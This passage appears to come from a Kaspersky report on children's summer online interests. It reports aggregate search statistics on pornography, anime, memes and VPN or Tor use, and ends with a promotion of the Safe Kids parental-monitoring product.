If we are to compare our annual and summer statistics, it is clear that children become less interested in pornographic content during summer vacation: 14.90% of search queries for the whole year vs 10.50% for summer. Regarding visits to porn websites from the PC, the annual figure is 2.08%, vs 1.06% in summer.

Search queries suffered basically no change over these periods. This summer, children, as before, would be searching for “porn”, “hentai”, and the porn star Mia Khalifa, who, apart from her core activity, is quite a popular blogger with almost 17 million Instagram followers.

Anime, memes, VPN and much more

Other than the global interests, we have identified a few more noteworthy subjects to be covered in this article.

Children like watching anime and, according to search queries, they do it on the website Crunchyroll, one of the most popular queries in the “Anime” category.

Speaking of the meme world, children did not miss the buzz around the American Storm Area 51 event, a subject of active discussion online this summer. There were also many queries about Grumpy Cat, who died this May, sparking much interest.

This summer, we also noticed children paying somewhat more attention to online privacy and anonymity. Queries about VPN, Proxy and the Tor browser have made it to the top of the list. On the whole, according to our data, children’s interest in the subject has been on the rise of late.


Children are well informed about what is going on in the world. Many of this summer’s big internet events got their attention. Moreover, many things are happening exactly thanks to children. Thus, the 100 million Roblox users are mostly kids. In the early days of TikTok, most of the network’s users were children and teenagers — the trend was taken up by adults only later.

Kaspersky Lab’s Safe Kids product allows parents to follow the child’s interests and stay informed about the child’s search and browsing history. We recommend using this tool as your assistant in building a relationship of trust with your child, rather than as yet another internet filter.